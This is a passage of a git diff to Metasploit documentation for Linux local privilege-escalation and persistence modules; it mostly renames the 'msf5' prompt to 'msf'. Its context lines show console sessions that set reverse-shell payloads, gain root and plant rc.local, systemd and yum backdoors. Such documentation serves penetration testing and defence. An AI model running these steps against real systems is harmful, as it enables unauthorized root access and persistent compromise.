set lhost 172.16.191.165 lhost => 172.16.191.165 - msf5 exploit(linux/local/ktsuss_suid_priv_esc) > run + msf exploit(linux/local/ktsuss_suid_priv_esc) > run [*] Started reverse TCP handler on 172.16.191.165:4444 [+] /usr/bin/ktsuss is setuid 
@@ -83,21 +83,21 @@ ### ktsuss 1.3 on SparkyLinux 6 (2019.08) (LXQT) (x64) ``` - msf5 > use exploit/linux/local/ktsuss_suid_priv_esc - msf5 exploit(linux/local/ktsuss_suid_priv_esc) > set session 1 + msf > use exploit/linux/local/ktsuss_suid_priv_esc + msf exploit(linux/local/ktsuss_suid_priv_esc) > set session 1 session => 1 - msf5 exploit(linux/local/ktsuss_suid_priv_esc) > set verbose true + msf exploit(linux/local/ktsuss_suid_priv_esc) > set verbose true verbose => true - msf5 exploit(linux/local/ktsuss_suid_priv_esc) > check + msf exploit(linux/local/ktsuss_suid_priv_esc) > check [+] /usr/bin/ktsuss is setuid [*] uid=1001(test) gid=1002(test) euid=0(root) groups=1002(test) [+] The target is vulnerable. - msf5 exploit(linux/local/ktsuss_suid_priv_esc) > set payload linux/x64/meterpreter/reverse_tcp + msf exploit(linux/local/ktsuss_suid_priv_esc) > set payload linux/x64/meterpreter/reverse_tcp payload => linux/x64/meterpreter/reverse_tcp - msf5 exploit(linux/local/ktsuss_suid_priv_esc) > set lhost 172.16.191.165 + msf exploit(linux/local/ktsuss_suid_priv_esc) > set lhost 172.16.191.165 lhost => 172.16.191.165 - msf5 exploit(linux/local/ktsuss_suid_priv_esc) > run + msf exploit(linux/local/ktsuss_suid_priv_esc) > run [*] Started reverse TCP handler on 172.16.191.165:4444 [+] /usr/bin/ktsuss is setuid diff --git a/documentation/modules/exploit/linux/local/libuser_roothelper_priv_esc.md b/documentation/modules/exploit/linux/local/libuser_roothelper_priv_esc.md index 49257dff7f..e455adf277 100644 --- a/documentation/modules/exploit/linux/local/libuser_roothelper_priv_esc.md +++ b/documentation/modules/exploit/linux/local/libuser_roothelper_priv_esc.md 
@@ -76,11 +76,11 @@ ### libuser 0.56.13-5.el6 on Red Hat 6.6 (x86_64) ``` - msf5 exploit(linux/local/libuser_roothelper_priv_esc) > set session 1 + msf exploit(linux/local/libuser_roothelper_priv_esc) > set session 1 session => 1 - msf5 exploit(linux/local/libuser_roothelper_priv_esc) > set password password + msf exploit(linux/local/libuser_roothelper_priv_esc) > set password password password => password - msf5 exploit(linux/local/libuser_roothelper_priv_esc) > run + msf exploit(linux/local/libuser_roothelper_priv_esc) > run [*] Started reverse TCP handler on 172.16.191.188:4444 [*] Writing '/tmp/.QQ4pE9nj.c' (29342 bytes) ... @@ -103,11 +103,11 @@ ### libuser 0.60-5.el7 on CentOS 7.1-1503 (x86_64) ``` - msf5 exploit(linux/local/libuser_roothelper_priv_esc) > set session 1 + msf exploit(linux/local/libuser_roothelper_priv_esc) > set session 1 session => 1 - msf5 exploit(linux/local/libuser_roothelper_priv_esc) > set password password + msf exploit(linux/local/libuser_roothelper_priv_esc) > set password password password => password - msf5 exploit(linux/local/libuser_roothelper_priv_esc) > run + msf exploit(linux/local/libuser_roothelper_priv_esc) > run [*] Started reverse TCP handler on 172.16.191.188:4444 [*] Writing '/tmp/.Ake5GA' (103396 bytes) ... @@ -130,11 +130,11 @@ ### libuser 0.60-6.fc21 on Fedora Desktop 21 (x86_64) ``` - msf5 exploit(linux/local/libuser_roothelper_priv_esc) > set session 1 + msf exploit(linux/local/libuser_roothelper_priv_esc) > set session 1 session => 1 - msf5 exploit(linux/local/libuser_roothelper_priv_esc) > set password password + msf exploit(linux/local/libuser_roothelper_priv_esc) > set password password password => password - msf5 exploit(linux/local/libuser_roothelper_priv_esc) > run + msf exploit(linux/local/libuser_roothelper_priv_esc) > run [*] Started reverse TCP handler on 172.16.191.188:4444 [*] Writing '/tmp/.ByQC9FHS.c' (29342 bytes) ... 
diff --git a/documentation/modules/exploit/linux/local/nested_namespace_idmap_limit_priv_esc.md b/documentation/modules/exploit/linux/local/nested_namespace_idmap_limit_priv_esc.md index 0d73624685..2fa286508c 100644 --- a/documentation/modules/exploit/linux/local/nested_namespace_idmap_limit_priv_esc.md +++ b/documentation/modules/exploit/linux/local/nested_namespace_idmap_limit_priv_esc.md 
@@ -74,23 +74,23 @@ The executables were cross-compiled with [musl-cross](https://s3.amazonaws.com/m ### Fedora Workstation 28 (verbose output) ``` - msf5 > use exploit/linux/local/nested_namespace_idmap_limit_priv_esc - msf5 exploit(linux/local/nested_namespace_idmap_limit_priv_esc) > set payload linux/x64/meterpreter/reverse_tcp + msf > use exploit/linux/local/nested_namespace_idmap_limit_priv_esc + msf exploit(linux/local/nested_namespace_idmap_limit_priv_esc) > set payload linux/x64/meterpreter/reverse_tcp payload => linux/x64/meterpreter/reverse_tcp - msf5 exploit(linux/local/nested_namespace_idmap_limit_priv_esc) > set session 1 + msf exploit(linux/local/nested_namespace_idmap_limit_priv_esc) > set session 1 session => 1 - msf5 exploit(linux/local/nested_namespace_idmap_limit_priv_esc) > set lhost 172.16.191.188 + msf exploit(linux/local/nested_namespace_idmap_limit_priv_esc) > set lhost 172.16.191.188 lhost => 172.16.191.188 - msf5 exploit(linux/local/nested_namespace_idmap_limit_priv_esc) > set verbose true + msf exploit(linux/local/nested_namespace_idmap_limit_priv_esc) > set verbose true verbose => true - msf5 exploit(linux/local/nested_namespace_idmap_limit_priv_esc) > check + msf exploit(linux/local/nested_namespace_idmap_limit_priv_esc) > check [+] Unprivileged user namespaces are permitted [+] /usr/bin/newuidmap is set-uid [+] /usr/bin/newgidmap is set-uid [+] Kernel version 4.16.3-301.fc28.x86_64 appears to be vulnerable [*] The target appears to be vulnerable. - msf5 exploit(linux/local/nested_namespace_idmap_limit_priv_esc) > run + msf exploit(linux/local/nested_namespace_idmap_limit_priv_esc) > run [*] Started reverse TCP handler on 172.16.191.188:4444 [+] Unprivileged user namespaces are permitted diff --git a/documentation/modules/exploit/linux/local/network_manager_vpnc_username_priv_esc.md b/documentation/modules/exploit/linux/local/network_manager_vpnc_username_priv_esc.md index a9e5057576..46f59b090d 100644 
--- a/documentation/modules/exploit/linux/local/network_manager_vpnc_username_priv_esc.md +++ b/documentation/modules/exploit/linux/local/network_manager_vpnc_username_priv_esc.md @@ -56,14 +56,14 @@ ## Scenarios ``` - msf5 > use exploit/linux/local/network_manager_vpnc_username_priv_esc - msf5 exploit(linux/local/network_manager_vpnc_username_priv_esc) > set session 1 + msf > use exploit/linux/local/network_manager_vpnc_username_priv_esc + msf exploit(linux/local/network_manager_vpnc_username_priv_esc) > set session 1 session => 1 - msf5 exploit(linux/local/network_manager_vpnc_username_priv_esc) > set verbose true + msf exploit(linux/local/network_manager_vpnc_username_priv_esc) > set verbose true verbose => true - msf5 exploit(linux/local/network_manager_vpnc_username_priv_esc) > set lhost 172.16.191.188 + msf exploit(linux/local/network_manager_vpnc_username_priv_esc) > set lhost 172.16.191.188 lhost => 172.16.191.188 - msf5 exploit(linux/local/network_manager_vpnc_username_priv_esc) > run + msf exploit(linux/local/network_manager_vpnc_username_priv_esc) > run [*] Started reverse TCP handler on 172.16.191.188:4444 [+] nmcli utility is installed diff --git a/documentation/modules/exploit/linux/local/omniresolve_suid_priv_esc.md b/documentation/modules/exploit/linux/local/omniresolve_suid_priv_esc.md index a2a07cafbd..5b7910cade 100755 --- a/documentation/modules/exploit/linux/local/omniresolve_suid_priv_esc.md +++ b/documentation/modules/exploit/linux/local/omniresolve_suid_priv_esc.md 
@@ -47,16 +47,16 @@ ### DP 10.40 build 118 on CentOS Linux release 7.6.1810 (Core) ``` - msf5 > use exploit/linux/local/omniresolve_suid_priv_esc - msf5 exploit(linux/local/omniresolve_suid_priv_esc) > set session 1 + msf > use exploit/linux/local/omniresolve_suid_priv_esc + msf exploit(linux/local/omniresolve_suid_priv_esc) > set session 1 session => 1 - msf5 exploit(linux/local/omniresolve_suid_priv_esc) > check + msf exploit(linux/local/omniresolve_suid_priv_esc) > check [+] The target is vulnerable. - msf5 exploit(linux/local/omniresolve_suid_priv_esc) > set payload linux/x64/meterpreter/reverse_tcp + msf exploit(linux/local/omniresolve_suid_priv_esc) > set payload linux/x64/meterpreter/reverse_tcp payload => linux/x64/meterpreter/reverse_tcp - msf5 exploit(linux/local/komniresolve_suid_priv_esc) > set lhost 192.168.0.113 + msf exploit(linux/local/komniresolve_suid_priv_esc) > set lhost 192.168.0.113 lhost => 192.168.0.113 - msf5 exploit(linux/local/omniresolve_suid_priv_esc) > run + msf exploit(linux/local/omniresolve_suid_priv_esc) > run [*] Started reverse TCP handler on 192.168.0.113:4444 [*] Sending stage (3021284 bytes) to 192.168.0.107 diff --git a/documentation/modules/exploit/linux/local/ptrace_sudo_token_priv_esc.md b/documentation/modules/exploit/linux/local/ptrace_sudo_token_priv_esc.md index 3c926dbadd..559ec0f174 100644 --- a/documentation/modules/exploit/linux/local/ptrace_sudo_token_priv_esc.md +++ b/documentation/modules/exploit/linux/local/ptrace_sudo_token_priv_esc.md 
@@ -47,16 +47,16 @@ ### CentOS 7.4.1708 (x64) ``` - msf5 > use exploit/linux/local/ptrace_sudo_token_priv_esc - msf5 exploit(linux/local/ptrace_sudo_token_priv_esc) > set session 1 + msf > use exploit/linux/local/ptrace_sudo_token_priv_esc + msf exploit(linux/local/ptrace_sudo_token_priv_esc) > set session 1 session => 1 - msf5 exploit(linux/local/ptrace_sudo_token_priv_esc) > set payload linux/x64/meterpreter/reverse_tcp + msf exploit(linux/local/ptrace_sudo_token_priv_esc) > set payload linux/x64/meterpreter/reverse_tcp payload => linux/x64/meterpreter/reverse_tcp - msf5 exploit(linux/local/ptrace_sudo_token_priv_esc) > set lhost 172.16.191.165 + msf exploit(linux/local/ptrace_sudo_token_priv_esc) > set lhost 172.16.191.165 lhost => 172.16.191.165 - msf5 exploit(linux/local/ptrace_sudo_token_priv_esc) > set verbose true + msf exploit(linux/local/ptrace_sudo_token_priv_esc) > set verbose true verbose => true - msf5 exploit(linux/local/ptrace_sudo_token_priv_esc) > run + msf exploit(linux/local/ptrace_sudo_token_priv_esc) > run [*] Started reverse TCP handler on 172.16.191.165:4444 [+] YAMA ptrace scope is not restrictive 
@@ -92,16 +92,16 @@ ### Debian 9.8 (x64) ``` - msf5 > use exploit/linux/local/ptrace_sudo_token_priv_esc - msf5 exploit(linux/local/ptrace_sudo_token_priv_esc) > set session 1 + msf > use exploit/linux/local/ptrace_sudo_token_priv_esc + msf exploit(linux/local/ptrace_sudo_token_priv_esc) > set session 1 session => 1 - msf5 exploit(linux/local/ptrace_sudo_token_priv_esc) > set payload linux/x64/meterpreter/reverse_tcp + msf exploit(linux/local/ptrace_sudo_token_priv_esc) > set payload linux/x64/meterpreter/reverse_tcp payload => linux/x64/meterpreter/reverse_tcp - msf5 exploit(linux/local/ptrace_sudo_token_priv_esc) > set lhost 172.16.191.165 + msf exploit(linux/local/ptrace_sudo_token_priv_esc) > set lhost 172.16.191.165 lhost => 172.16.191.165 - msf5 exploit(linux/local/ptrace_sudo_token_priv_esc) > set verbose true + msf exploit(linux/local/ptrace_sudo_token_priv_esc) > set verbose true verbose => true - msf5 exploit(linux/local/ptrace_sudo_token_priv_esc) > run + msf exploit(linux/local/ptrace_sudo_token_priv_esc) > run [*] Started reverse TCP handler on 172.16.191.165:4444 [+] YAMA ptrace scope is not restrictive diff --git a/documentation/modules/exploit/linux/local/ptrace_traceme_pkexec_helper.md b/documentation/modules/exploit/linux/local/ptrace_traceme_pkexec_helper.md index dfbd61ffb2..c6f7c36efa 100644 --- a/documentation/modules/exploit/linux/local/ptrace_traceme_pkexec_helper.md +++ b/documentation/modules/exploit/linux/local/ptrace_traceme_pkexec_helper.md 
@@ -75,14 +75,14 @@ msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=192.168.56.1 LPORT=4444 -f e # Start a handler msfconsole -msf5 > use exploit/multi/handler -msf5 exploit(multi/handler) > set payload linux/x64/meterpreter/reverse_tcp +msf > use exploit/multi/handler +msf exploit(multi/handler) > set payload linux/x64/meterpreter/reverse_tcp payload => linux/x64/meterpreter/reverse_tcp -msf5 exploit(multi/handler) > set LHOST 192.168.56.1 +msf exploit(multi/handler) > set LHOST 192.168.56.1 LHOST => 192.168.56.1 -msf5 exploit(multi/handler) > set LPORT 4444 +msf exploit(multi/handler) > set LPORT 4444 LPORT => 4444 -msf5 exploit(multi/handler) > run +msf exploit(multi/handler) > run [*] Started reverse TCP handler on 192.168.56.1:4444 @@ -100,14 +100,14 @@ meterpreter > background In this scenario, gcc is installed so we can live compile on the system. ``` -msf5 exploit(multi/handler) > use exploit/linux/local/ptrace_traceme_pkexec_helper -msf5 exploit(linux/local/ptrace_traceme_pkexec_helper) > set LHOST 192.168.56.1 +msf exploit(multi/handler) > use exploit/linux/local/ptrace_traceme_pkexec_helper +msf exploit(linux/local/ptrace_traceme_pkexec_helper) > set LHOST 192.168.56.1 LHOST => 192.168.56.1 -msf5 exploit(linux/local/ptrace_traceme_pkexec_helper) > set SESSION 1 +msf exploit(linux/local/ptrace_traceme_pkexec_helper) > set SESSION 1 SESSION => 1 -msf5 exploit(linux/local/ptrace_traceme_pkexec_helper) > set VERBOSE true +msf exploit(linux/local/ptrace_traceme_pkexec_helper) > set VERBOSE true VERBOSE => true -msf5 exploit(linux/local/ptrace_traceme_pkexec_helper) > exploit +msf exploit(linux/local/ptrace_traceme_pkexec_helper) > exploit [*] Started reverse TCP handler on 192.168.56.1:4444 [+] Kernel version 4.15.0-13-generic appears to be vulnerable [+] pkexec is installed 
@@ -140,14 +140,14 @@ Server username: uid=0, gid=0, euid=0, egid=0 It is possible to force pre-compiled binaries, in a scenario where `build-essential` or `gcc` aren't on the system. ``` -msf5 exploit(multi/handler) > use exploit/linux/local/ptrace_traceme_pkexec_helper -msf5 exploit(linux/local/ptrace_traceme_pkexec_helper) > set LHOST 192.168.56.1 +msf exploit(multi/handler) > use exploit/linux/local/ptrace_traceme_pkexec_helper +msf exploit(linux/local/ptrace_traceme_pkexec_helper) > set LHOST 192.168.56.1 LHOST => 192.168.56.1 -msf5 exploit(linux/local/ptrace_traceme_pkexec_helper) > set SESSION 1 +msf exploit(linux/local/ptrace_traceme_pkexec_helper) > set SESSION 1 SESSION => 1 -msf5 exploit(linux/local/ptrace_traceme_pkexec_helper) > set COMPILE False +msf exploit(linux/local/ptrace_traceme_pkexec_helper) > set COMPILE False COMPILE => False -msf5 exploit(linux/local/ptrace_traceme_pkexec_helper) > run +msf exploit(linux/local/ptrace_traceme_pkexec_helper) > run [*] Started reverse TCP handler on 192.168.56.1:4444 [+] Kernel version 4.15.0-13-generic appears to be vulnerable diff --git a/documentation/modules/exploit/linux/local/rc_local_persistence.md b/documentation/modules/exploit/linux/local/rc_local_persistence.md index 9b81d94d2e..6f6bfe53d4 100644 --- a/documentation/modules/exploit/linux/local/rc_local_persistence.md +++ b/documentation/modules/exploit/linux/local/rc_local_persistence.md @@ -20,10 +20,10 @@ This module patches `/etc/rc.local` in order to launch a payload upon reboot. #### Escalate the session if needed ``` -msf5 exploit(linux/local/rc_local_persistence) > use post/multi/manage/sudo -msf5 post(multi/manage/sudo) > set session 3 +msf exploit(linux/local/rc_local_persistence) > use post/multi/manage/sudo +msf post(multi/manage/sudo) > set session 3 session => 3 -msf5 post(multi/manage/sudo) > run +msf post(multi/manage/sudo) > run [*] SUDO: Attempting to upgrade to UID 0 via sudo [*] No password available, trying a passwordless sudo. 
@@ -34,12 +34,12 @@ msf5 post(multi/manage/sudo) > run #### Persist ``` -msf5 post(multi/manage/sudo) > use exploit/linux/local/rc_local_persistence -msf5 exploit(multi/handler) > set payload cmd/unix/reverse_ruby +msf post(multi/manage/sudo) > use exploit/linux/local/rc_local_persistence +msf exploit(multi/handler) > set payload cmd/unix/reverse_ruby payload => cmd/unix/reverse_ruby -msf5 exploit(linux/local/rc_local_persistence) > set LHOST 192.168.0.41 +msf exploit(linux/local/rc_local_persistence) > set LHOST 192.168.0.41 LHOST => 192.168.0.41 -msf5 exploit(linux/local/rc_local_persistence) > run +msf exploit(linux/local/rc_local_persistence) > run [*] Reading /etc/rc.local [*] Patching /etc/rc.local diff --git a/documentation/modules/exploit/linux/local/rds_atomic_free_op_null_pointer_deref_priv_esc.md b/documentation/modules/exploit/linux/local/rds_atomic_free_op_null_pointer_deref_priv_esc.md index 9da41b49bf..30a628325b 100644 --- a/documentation/modules/exploit/linux/local/rds_atomic_free_op_null_pointer_deref_priv_esc.md +++ b/documentation/modules/exploit/linux/local/rds_atomic_free_op_null_pointer_deref_priv_esc.md 
@@ -62,12 +62,12 @@ ### Ubuntu 16.04 kernel 4.8.0-51-lowlatency #54~16.04.1-Ubuntu ``` - msf5 > use exploit/linux/local/rds_atomic_free_op_null_pointer_deref_priv_esc - msf5 exploit(linux/local/rds_atomic_free_op_null_pointer_deref_priv_esc) > set session 1 + msf > use exploit/linux/local/rds_atomic_free_op_null_pointer_deref_priv_esc + msf exploit(linux/local/rds_atomic_free_op_null_pointer_deref_priv_esc) > set session 1 session => 1 - msf5 exploit(linux/local/rds_atomic_free_op_null_pointer_deref_priv_esc) > set verbose true + msf exploit(linux/local/rds_atomic_free_op_null_pointer_deref_priv_esc) > set verbose true verbose => true - msf5 exploit(linux/local/rds_atomic_free_op_null_pointer_deref_priv_esc) > check + msf exploit(linux/local/rds_atomic_free_op_null_pointer_deref_priv_esc) > check [+] System architecture x86_64 is supported [+] Linux kernel 4.8.0-51-lowlatency #54~16.04.1-Ubuntu is vulnerable @@ -76,9 +76,9 @@ [+] grsecurity is not in use [+] rds.ko kernel module is loaded [*] The target appears to be vulnerable. - msf5 exploit(linux/local/rds_atomic_free_op_null_pointer_deref_priv_esc) > set lhost 172.16.191.165 + msf exploit(linux/local/rds_atomic_free_op_null_pointer_deref_priv_esc) > set lhost 172.16.191.165 lhost => 172.16.191.165 - msf5 exploit(linux/local/rds_atomic_free_op_null_pointer_deref_priv_esc) > run + msf exploit(linux/local/rds_atomic_free_op_null_pointer_deref_priv_esc) > run [*] Started reverse TCP handler on 172.16.191.165:4444 [+] System architecture x86_64 is supported diff --git a/documentation/modules/exploit/linux/local/rds_rds_page_copy_user_priv_esc.md b/documentation/modules/exploit/linux/local/rds_rds_page_copy_user_priv_esc.md index 16ecc91c00..104a067b5f 100644 --- a/documentation/modules/exploit/linux/local/rds_rds_page_copy_user_priv_esc.md +++ b/documentation/modules/exploit/linux/local/rds_rds_page_copy_user_priv_esc.md 
@@ -62,12 +62,12 @@ The executables were cross-compiled with [musl-cross](https://s3.amazonaws.com/m ## Scenarios ``` - msf5 > use exploit/linux/local/rds_rds_page_copy_user_priv_esc - msf5 exploit(linux/local/rds_rds_page_copy_user_priv_esc) > set session 1 + msf > use exploit/linux/local/rds_rds_page_copy_user_priv_esc + msf exploit(linux/local/rds_rds_page_copy_user_priv_esc) > set session 1 session => 1 - msf5 exploit(linux/local/rds_rds_page_copy_user_priv_esc) > set lhost 172.16.191.188 + msf exploit(linux/local/rds_rds_page_copy_user_priv_esc) > set lhost 172.16.191.188 lhost => 172.16.191.188 - msf5 exploit(linux/local/rds_rds_page_copy_user_priv_esc) > run + msf exploit(linux/local/rds_rds_page_copy_user_priv_esc) > run [*] Started reverse TCP handler on 172.16.191.188:4444 [*] Writing '/tmp/.zEAOL.c' (7282 bytes) ... diff --git a/documentation/modules/exploit/linux/local/reptile_rootkit_reptile_cmd_priv_esc.md b/documentation/modules/exploit/linux/local/reptile_rootkit_reptile_cmd_priv_esc.md index 0dcc7e5d39..e2666e70f6 100644 --- a/documentation/modules/exploit/linux/local/reptile_rootkit_reptile_cmd_priv_esc.md +++ b/documentation/modules/exploit/linux/local/reptile_rootkit_reptile_cmd_priv_esc.md 
@@ -44,18 +44,18 @@ ### Ubuntu 18.04.3 (x64) ``` - msf5 > use exploit/linux/local/reptile_rootkit_reptile_cmd_priv_esc - msf5 exploit(linux/local/reptile_rootkit_reptile_cmd_priv_esc) > set session 1 + msf > use exploit/linux/local/reptile_rootkit_reptile_cmd_priv_esc + msf exploit(linux/local/reptile_rootkit_reptile_cmd_priv_esc) > set session 1 session => 1 - msf5 exploit(linux/local/reptile_rootkit_reptile_cmd_priv_esc) > set verbose true + msf exploit(linux/local/reptile_rootkit_reptile_cmd_priv_esc) > set verbose true verbose => true - msf5 exploit(linux/local/reptile_rootkit_reptile_cmd_priv_esc) > check + msf exploit(linux/local/reptile_rootkit_reptile_cmd_priv_esc) > check [+] /reptile/reptile_cmd is executable [*] Output: uid=0(root) gid=0(root) groups=0(root) [+] Reptile is installed and loaded [+] The target is vulnerable. - msf5 exploit(linux/local/reptile_rootkit_reptile_cmd_priv_esc) > run + msf exploit(linux/local/reptile_rootkit_reptile_cmd_priv_esc) > run [*] Started reverse TCP handler on 172.16.191.165:4444 [+] /reptile/reptile_cmd is executable diff --git a/documentation/modules/exploit/linux/local/service_persistence.md b/documentation/modules/exploit/linux/local/service_persistence.md index 46d9200434..c0a3c3a08a 100644 --- a/documentation/modules/exploit/linux/local/service_persistence.md +++ b/documentation/modules/exploit/linux/local/service_persistence.md @@ -256,7 +256,7 @@ Now with a multi handler, we can catch systemd restarting the process every 10se ### systemd user (Ubuntu 16.04 Server - vagrant) - msf5 exploit(linux/local/service_persistence) > options + msf exploit(linux/local/service_persistence) > options Module options (exploit/linux/local/service_persistence): 
@@ -283,7 +283,7 @@ Now with a multi handler, we can catch systemd restarting the process every 10se 4 systemd user - msf5 exploit(linux/local/service_persistence) > run + msf exploit(linux/local/service_persistence) > run [!] SESSION may not be compatible with this module. [*] Started reverse TCP handler on 172.28.128.1:4444 diff --git a/documentation/modules/exploit/linux/local/servu_ftp_server_prepareinstallation_priv_esc.md b/documentation/modules/exploit/linux/local/servu_ftp_server_prepareinstallation_priv_esc.md index 1804aa03c1..804c49dd68 100644 --- a/documentation/modules/exploit/linux/local/servu_ftp_server_prepareinstallation_priv_esc.md +++ b/documentation/modules/exploit/linux/local/servu_ftp_server_prepareinstallation_priv_esc.md @@ -47,13 +47,13 @@ ### Debian 9.6 (x64) ``` - msf5 exploit(multi/handler) > back - msf5 > use exploit/linux/local/servu_ftp_server_prepareinstallation_priv_esc - msf5 exploit(linux/local/servu_ftp_server_prepareinstallation_priv_esc) > set session 1 + msf exploit(multi/handler) > back + msf > use exploit/linux/local/servu_ftp_server_prepareinstallation_priv_esc + msf exploit(linux/local/servu_ftp_server_prepareinstallation_priv_esc) > set session 1 session => 1 - msf5 exploit(linux/local/servu_ftp_server_prepareinstallation_priv_esc) > set verbose true + msf exploit(linux/local/servu_ftp_server_prepareinstallation_priv_esc) > set verbose true verbose => true - msf5 exploit(linux/local/servu_ftp_server_prepareinstallation_priv_esc) > run + msf exploit(linux/local/servu_ftp_server_prepareinstallation_priv_esc) > run [*] Started reverse TCP handler on 172.16.191.165:4444 [+] bash shell is available diff --git a/documentation/modules/exploit/linux/local/systemtap_modprobe_options_priv_esc.md b/documentation/modules/exploit/linux/local/systemtap_modprobe_options_priv_esc.md index 172b07f609..f14ece1001 100644 --- a/documentation/modules/exploit/linux/local/systemtap_modprobe_options_priv_esc.md 
+++ b/documentation/modules/exploit/linux/local/systemtap_modprobe_options_priv_esc.md @@ -45,12 +45,12 @@ ### Red Hat Enterprise Linux 5.5 (x64) ``` - msf5 > use exploit/linux/local/systemtap_modprobe_options_priv_esc - msf5 exploit(linux/local/systemtap_modprobe_options_priv_esc) > set session 1 + msf > use exploit/linux/local/systemtap_modprobe_options_priv_esc + msf exploit(linux/local/systemtap_modprobe_options_priv_esc) > set session 1 session => 1 - msf5 exploit(linux/local/systemtap_modprobe_options_priv_esc) > set verbose true + msf exploit(linux/local/systemtap_modprobe_options_priv_esc) > set verbose true verbose => true - msf5 exploit(linux/local/systemtap_modprobe_options_priv_esc) > run + msf exploit(linux/local/systemtap_modprobe_options_priv_esc) > run [*] Started reverse TCP handler on 172.16.191.165:4444 [+] /usr/bin/staprun is executable @@ -81,12 +81,12 @@ ### Fedora 13 (x86) ``` - msf5 > use exploit/linux/local/systemtap_modprobe_options_priv_esc - msf5 exploit(linux/local/systemtap_modprobe_options_priv_esc) > set session 1 + msf > use exploit/linux/local/systemtap_modprobe_options_priv_esc + msf exploit(linux/local/systemtap_modprobe_options_priv_esc) > set session 1 session => 1 - msf5 exploit(linux/local/systemtap_modprobe_options_priv_esc) > set verbose true + msf exploit(linux/local/systemtap_modprobe_options_priv_esc) > set verbose true verbose => true - msf5 exploit(linux/local/systemtap_modprobe_options_priv_esc) > run + msf exploit(linux/local/systemtap_modprobe_options_priv_esc) > run [*] Started reverse TCP handler on 172.16.191.165:4444 [+] /usr/bin/staprun is executable diff --git a/documentation/modules/exploit/linux/local/ufo_privilege_escalation.md b/documentation/modules/exploit/linux/local/ufo_privilege_escalation.md index 334859a52e..c7755ee705 100644 --- a/documentation/modules/exploit/linux/local/ufo_privilege_escalation.md +++ b/documentation/modules/exploit/linux/local/ufo_privilege_escalation.md 
@@ -73,14 +73,14 @@ resource (ubuntu.rb)> exploit In this scenario, gcc is installed so we can live compile on the system. ``` -msf5 auxiliary(scanner/ssh/ssh_login) > use exploit/linux/local/ufo_privilege_escalation -msf5 exploit(linux/local/ufo_privilege_escalation) > set verbose true +msf auxiliary(scanner/ssh/ssh_login) > use exploit/linux/local/ufo_privilege_escalation +msf exploit(linux/local/ufo_privilege_escalation) > set verbose true verbose => true -msf5 exploit(linux/local/ufo_privilege_escalation) > set session 1 +msf exploit(linux/local/ufo_privilege_escalation) > set session 1 session => 1 -msf5 exploit(linux/local/ufo_privilege_escalation) > set lhost 1.1.1.1 +msf exploit(linux/local/ufo_privilege_escalation) > set lhost 1.1.1.1 lhost => 1.1.1.1 -msf5 exploit(linux/local/ufo_privilege_escalation) > exploit +msf exploit(linux/local/ufo_privilege_escalation) > exploit [!] SESSION may not be compatible with this module. [*] Started reverse TCP handler on 1.1.1.1:4444 diff --git a/documentation/modules/exploit/linux/local/vmware_alsa_config.md b/documentation/modules/exploit/linux/local/vmware_alsa_config.md index 2f9bad21e3..a15927105a 100644 --- a/documentation/modules/exploit/linux/local/vmware_alsa_config.md +++ b/documentation/modules/exploit/linux/local/vmware_alsa_config.md 
@@ -50,12 +50,12 @@ ### Command Shell Session - VMware Player 12.5.0 (Debian 8 Jessie) ``` - msf5 > use exploit/linux/local/vmware_alsa_config - msf5 exploit(linux/local/vmware_alsa_config) > set lhost 172.16.191.188 + msf > use exploit/linux/local/vmware_alsa_config + msf exploit(linux/local/vmware_alsa_config) > set lhost 172.16.191.188 lhost => 172.16.191.188 - msf5 exploit(linux/local/vmware_alsa_config) > set session 1 + msf exploit(linux/local/vmware_alsa_config) > set session 1 session => 1 - msf5 exploit(linux/local/vmware_alsa_config) > run + msf exploit(linux/local/vmware_alsa_config) > run [*] Started reverse TCP handler on 172.16.191.188:4444 [*] Writing '/tmp/pSvQHD5S5fh/afLaYVIoUm.so.c' (526 bytes) ... @@ -83,12 +83,12 @@ ### Meterpreter Session - VMware Player 12.5.0 (Debian 8 Jessie) ``` - msf5 > use exploit/linux/local/vmware_alsa_config - msf5 exploit(linux/local/vmware_alsa_config) > set lhost 172.16.191.188 + msf > use exploit/linux/local/vmware_alsa_config + msf exploit(linux/local/vmware_alsa_config) > set lhost 172.16.191.188 lhost => 172.16.191.188 - msf5 exploit(linux/local/vmware_alsa_config) > set session 1 + msf exploit(linux/local/vmware_alsa_config) > set session 1 session => 1 - msf5 exploit(linux/local/vmware_alsa_config) > run + msf exploit(linux/local/vmware_alsa_config) > run [*] Started reverse TCP handler on 172.16.191.188:4444 [*] Writing '/tmp/5irkXF31Iw/GHAPsWBkjix.so.c' (527 bytes) ... diff --git a/documentation/modules/exploit/linux/local/yum_package_manager_persistence.md b/documentation/modules/exploit/linux/local/yum_package_manager_persistence.md index 3524bf632f..9f205f4df6 100644 --- a/documentation/modules/exploit/linux/local/yum_package_manager_persistence.md +++ b/documentation/modules/exploit/linux/local/yum_package_manager_persistence.md 
@@ -35,7 +35,7 @@ Plugin path to use default is (/usr/lib/yum-plugins/) ### Tested on Fedora 21 ``` -msf5 exploit(linux/local/yum_package_manager_persistence) > sessions +msf exploit(linux/local/yum_package_manager_persistence) > sessions Active sessions =============== @@ -44,22 +44,22 @@ Active sessions -- ---- ---- ----------- ---------- 1 shell x86/linux 172.22.222.136:4444 -> 172.22.222.135:43790 (172.22.222.135) -msf5 exploit(linux/local/yum_package_manager_persistence) > set session 1 +msf exploit(linux/local/yum_package_manager_persistence) > set session 1 session => 1 -msf5 exploit(linux/local/yum_package_manager_persistence) > set plugin langpacks +msf exploit(linux/local/yum_package_manager_persistence) > set plugin langpacks plugin => langpacks -msf5 exploit(linux/local/yum_package_manager_persistence) > set lhost 172.22.222.136 +msf exploit(linux/local/yum_package_manager_persistence) > set lhost 172.22.222.136 lhost => 172.22.222.136 -msf5 exploit(linux/local/yum_package_manager_persistence) > exploit +msf exploit(linux/local/yum_package_manager_persistence) > exploit [*] /usr/lib/yum-plugins/langpacks.py [+] Plugins are enabled! [*] Attempting to modify plugin [*] Backdoor uploaded to /usr/local/bin/z9fJTx2wVg [*] Backdoor will run on next Yum update -msf5 exploit(linux/local/yum_package_manager_persistence) > [*] Command shell session 2 opened (172.22.222.136:4444 -> 172.22.222.135:43791) at 2019-04-30 06:21:12 -0500 +msf exploit(linux/local/yum_package_manager_persistence) > [*] Command shell session 2 opened (172.22.222.136:4444 -> 172.22.222.135:43791) at 2019-04-30 06:21:12 -0500 -msf5 exploit(linux/local/yum_package_manager_persistence) > sessions +msf exploit(linux/local/yum_package_manager_persistence) > sessions Active sessions =============== 
